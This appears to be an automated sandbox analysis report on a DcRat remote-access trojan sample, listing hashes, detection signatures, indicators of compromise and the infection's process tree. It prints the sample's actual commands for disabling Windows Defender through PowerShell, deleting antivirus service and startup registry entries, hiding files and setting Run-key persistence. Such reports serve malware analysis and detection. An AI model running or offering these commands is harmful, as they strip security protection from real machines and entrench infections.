dcrat | 7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c

Analysis

max time kernel
96s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
29-01-2023 21:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe
Size

3.5MB
MD5

6a31b356444d196e1b484bfac18eaf6e
SHA1

fedb55b24c134a0055f70f26c9964b1219780428
SHA256

7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c
SHA512

5e8aa46c3afe3f2f35ad3f5ab0bc20afa7a752f30f35f4330e70c8226150659215820f73c3167f03366e87f8bd7daa67a9cff834f3768cf9d701a0f9dd53d34e
SSDEEP

98304:Db+bYAfeoIgy8J98XN18VBRUYDk3ptKSW8:DqEAfK2ENyPI3bKV8

Score

10^/10

dcrat evasion infostealer persistence rat trojan

Malware Config

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe	disable_win_def
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe	disable_win_def
behavioral2/memory/2092-173-0x0000000000760000-0x0000000000768000-memory.dmp	disable_win_def

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

Disable-Windows-Defender.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Disable-Windows-Defender.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Disable-Windows-Defender.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Disable-Windows-Defender.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Disable-Windows-Defender.exe

DCRat payload 5 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\savesdll\brokersaves.exe	dcrat
behavioral2/memory/2900-269-0x00000262F7A40000-0x00000262F7AB8000-memory.dmp	dcrat
C:\savesdll\brokersaves.exe	dcrat
C:\PerfLogs\brokersaves.exe	dcrat
C:\PerfLogs\brokersaves.exe	dcrat

Executes dropped EXE 13 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeDesktop.exeAAV (2).exeDisable-Windows-Defender.exeDCRatBuild.exeH6tchIl3Mk5re1vJkxJB.exebrokersaves.exebrokersaves.exe

pid	process
4632	7z.exe
2064	7z.exe
400	7z.exe
1152	7z.exe
1508	7z.exe
1740	7z.exe
396	Desktop.exe
4836	AAV (2).exe
2092	Disable-Windows-Defender.exe
216	DCRatBuild.exe
2552	H6tchIl3Mk5re1vJkxJB.exe
2900	brokersaves.exe
3424	brokersaves.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeH6tchIl3Mk5re1vJkxJB.exeWScript.exe7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exeDesktop.exeAAV (2).exeDCRatBuild.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	H6tchIl3Mk5re1vJkxJB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	Desktop.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	AAV (2).exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	DCRatBuild.exe

Loads dropped DLL 7 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeAAV (2).exe

pid process

4632 7z.exe
2064 7z.exe
400 7z.exe
1152 7z.exe
1508 7z.exe
1740 7z.exe
4836 AAV (2).exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

brokersaves.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brokersaves = "\"C:\\PerfLogs\\brokersaves.exe\""	brokersaves.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\ProgramData\\Microsoft OneDrive\\setup\\sihost.exe\""	brokersaves.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\ProgramData\\Package Cache\\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\\packages\\vcRuntimeMinimum_amd64\\conhost.exe\""	brokersaves.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Microsoft Office\\spoolsv.exe\""	brokersaves.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ProgramData\\SoftwareDistribution\\dllhost.exe\""	brokersaves.exe

Checks for any installed AV software in registry 1 TTPs 6 IoCs

Security Software Discovery

T1063

Processes:

reg.exereg.exesvchost.exereg.exereg.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AVP18.0.0	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\McAPExe	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\McProxy	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\avast! Antivirus	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AntiVirService	reg.exe

Drops file in Program Files directory 2 IoCs

Processes:

brokersaves.exe

description	ioc	process
File created	C:\Program Files\Microsoft Office\spoolsv.exe	brokersaves.exe
File created	C:\Program Files\Microsoft Office\f3b6ecef712a24f33798f5d2fb3790c3d9b894c4	brokersaves.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2920 schtasks.exe
1876 schtasks.exe
1404 schtasks.exe
4868 schtasks.exe
5032 schtasks.exe
2896 schtasks.exe

pid	process
2920	schtasks.exe
1876	schtasks.exe
1404	schtasks.exe
4868	schtasks.exe
5032	schtasks.exe
2896	schtasks.exe

Modifies registry class 2 IoCs

Processes:

DCRatBuild.exeH6tchIl3Mk5re1vJkxJB.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	DCRatBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	H6tchIl3Mk5re1vJkxJB.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exebrokersaves.exebrokersaves.exe

pid	process
3404	powershell.exe
2548	powershell.exe
3524	powershell.exe
2296	powershell.exe
2296	powershell.exe
4724	powershell.exe
4724	powershell.exe
3572	powershell.exe
3572	powershell.exe
968	powershell.exe
968	powershell.exe
2600	powershell.exe
2600	powershell.exe
2548	powershell.exe
2548	powershell.exe
3404	powershell.exe
3404	powershell.exe
3524	powershell.exe
3524	powershell.exe
1396	powershell.exe
1396	powershell.exe
2312	powershell.exe
2312	powershell.exe
2296	powershell.exe
2296	powershell.exe
4724	powershell.exe
4724	powershell.exe
3572	powershell.exe
3572	powershell.exe
968	powershell.exe
2600	powershell.exe
1396	powershell.exe
2312	powershell.exe
2900	brokersaves.exe
3424	brokersaves.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exebrokersaves.exebrokersaves.exe

description	pid	process
Token: SeRestorePrivilege	4632	7z.exe
Token: 35	4632	7z.exe
Token: SeSecurityPrivilege	4632	7z.exe
Token: SeSecurityPrivilege	4632	7z.exe
Token: SeRestorePrivilege	2064	7z.exe
Token: 35	2064	7z.exe
Token: SeSecurityPrivilege	2064	7z.exe
Token: SeSecurityPrivilege	2064	7z.exe
Token: SeRestorePrivilege	400	7z.exe
Token: 35	400	7z.exe
Token: SeSecurityPrivilege	400	7z.exe
Token: SeSecurityPrivilege	400	7z.exe
Token: SeRestorePrivilege	1152	7z.exe
Token: 35	1152	7z.exe
Token: SeSecurityPrivilege	1152	7z.exe
Token: SeSecurityPrivilege	1152	7z.exe
Token: SeRestorePrivilege	1508	7z.exe
Token: 35	1508	7z.exe
Token: SeSecurityPrivilege	1508	7z.exe
Token: SeSecurityPrivilege	1508	7z.exe
Token: SeRestorePrivilege	1740	7z.exe
Token: 35	1740	7z.exe
Token: SeSecurityPrivilege	1740	7z.exe
Token: SeSecurityPrivilege	1740	7z.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeDebugPrivilege	2900	brokersaves.exe
Token: SeDebugPrivilege	3424	brokersaves.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.execmd.exeDesktop.exeAAV (2).execmd.exereg.exeDCRatBuild.exeWScript.exe

description	pid	process	target process
PID 4856 wrote to memory of 4740	4856	7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe	cmd.exe
PID 4856 wrote to memory of 4740	4856	7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe	cmd.exe
PID 4856 wrote to memory of 4740	4856	7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe	cmd.exe
PID 4740 wrote to memory of 4376	4740	cmd.exe	mode.com
PID 4740 wrote to memory of 4376	4740	cmd.exe	mode.com
PID 4740 wrote to memory of 4376	4740	cmd.exe	mode.com
PID 4740 wrote to memory of 4632	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 4632	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 2064	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 2064	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 400	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 400	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 1152	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 1152	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 1508	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 1508	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 1740	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 1740	4740	cmd.exe	7z.exe
PID 4740 wrote to memory of 1780	4740	cmd.exe	attrib.exe
PID 4740 wrote to memory of 1780	4740	cmd.exe	attrib.exe
PID 4740 wrote to memory of 1780	4740	cmd.exe	attrib.exe
PID 4740 wrote to memory of 396	4740	cmd.exe	Desktop.exe
PID 4740 wrote to memory of 396	4740	cmd.exe	Desktop.exe
PID 4740 wrote to memory of 396	4740	cmd.exe	Desktop.exe
PID 396 wrote to memory of 4836	396	Desktop.exe	AAV (2).exe
PID 396 wrote to memory of 4836	396	Desktop.exe	AAV (2).exe
PID 396 wrote to memory of 4836	396	Desktop.exe	AAV (2).exe
PID 4836 wrote to memory of 2092	4836	AAV (2).exe	Disable-Windows-Defender.exe
PID 4836 wrote to memory of 2092	4836	AAV (2).exe	Disable-Windows-Defender.exe
PID 4836 wrote to memory of 4196	4836	AAV (2).exe	cmd.exe
PID 4836 wrote to memory of 4196	4836	AAV (2).exe	cmd.exe
PID 4836 wrote to memory of 4196	4836	AAV (2).exe	cmd.exe
PID 396 wrote to memory of 216	396	Desktop.exe	DCRatBuild.exe
PID 396 wrote to memory of 216	396	Desktop.exe	DCRatBuild.exe
PID 396 wrote to memory of 216	396	Desktop.exe	DCRatBuild.exe
PID 4196 wrote to memory of 4296	4196	cmd.exe	reg.exe
PID 4196 wrote to memory of 4296	4196	cmd.exe	reg.exe
PID 4196 wrote to memory of 4296	4196	cmd.exe	reg.exe
PID 4196 wrote to memory of 3132	4196	cmd.exe	reg.exe
PID 4196 wrote to memory of 3132	4196	cmd.exe	reg.exe
PID 4196 wrote to memory of 3132	4196	cmd.exe	reg.exe
PID 2092 wrote to memory of 3404	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 3404	2092	reg.exe	powershell.exe
PID 216 wrote to memory of 3148	216	DCRatBuild.exe	WScript.exe
PID 216 wrote to memory of 3148	216	DCRatBuild.exe	WScript.exe
PID 216 wrote to memory of 3148	216	DCRatBuild.exe	WScript.exe
PID 2092 wrote to memory of 2548	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 2548	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 3524	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 3524	2092	reg.exe	powershell.exe
PID 4196 wrote to memory of 4704	4196	cmd.exe	reg.exe
PID 4196 wrote to memory of 4704	4196	cmd.exe	reg.exe
PID 4196 wrote to memory of 4704	4196	cmd.exe	reg.exe
PID 2092 wrote to memory of 2296	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 2296	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 4724	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 4724	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 3572	2092	reg.exe	powershell.exe
PID 2092 wrote to memory of 3572	2092	reg.exe	powershell.exe
PID 3148 wrote to memory of 640	3148	WScript.exe	cmd.exe
PID 3148 wrote to memory of 640	3148	WScript.exe	cmd.exe
PID 3148 wrote to memory of 640	3148	WScript.exe	cmd.exe
PID 4196 wrote to memory of 2424	4196	cmd.exe	reg.exe
PID 4196 wrote to memory of 2424	4196	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1780 attrib.exe

pid	process
1780	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe
"C:\Users\Admin\AppData\Local\Temp\7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4740

C:\Windows\SysWOW64\mode.com
mode 65,10
3⤵
PID:4376

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e file.zip -p___________32504pwd8196pwd16820___________ -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_5.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_4.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:400

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_3.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_2.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_1.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1740

C:\Windows\SysWOW64\attrib.exe
attrib +H "Desktop.exe"
3⤵
- Views/modifies file attributes
PID:1780

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Desktop.exe
"Desktop.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:396

C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4836

C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe
"C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe"
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:2092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent Never
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\1337\antiav.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:4196

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
6⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
6⤵
PID:3132

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
6⤵
PID:4704

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
6⤵
PID:2424

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
6⤵
PID:716

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
6⤵
PID:4576

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
6⤵
PID:1780

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
6⤵
PID:4496

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
6⤵
PID:4048

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
6⤵
PID:3424

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
6⤵
PID:396

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
6⤵
PID:4344

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
6⤵
PID:1360

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
6⤵
PID:456

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
6⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
6⤵
PID:5112

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
6⤵
PID:1896

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
6⤵
PID:1236

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
6⤵
PID:3036

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
6⤵
PID:3868

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
6⤵
PID:4496

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
6⤵
- Checks for any installed AV software in registry
PID:5100

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
6⤵
- Checks for any installed AV software in registry
PID:5012

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
6⤵
PID:2400

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
6⤵
PID:1060

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "C:\Windows\system32\rlls64.dll" /f /reg:32
6⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
6⤵
PID:4452

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
6⤵
PID:4864

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
6⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
6⤵
PID:3484

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
6⤵
PID:4376

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
6⤵
- Suspicious use of WriteProcessMemory
PID:2092

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
6⤵
PID:3768

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
6⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
6⤵
PID:4260

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
6⤵
PID:3672

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
6⤵
PID:2144

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
6⤵
PID:3716

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
6⤵
PID:5072

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
6⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
6⤵
PID:3568

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
6⤵
PID:3840

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
6⤵
PID:668

C:\Windows\SysWOW64\reg.exe
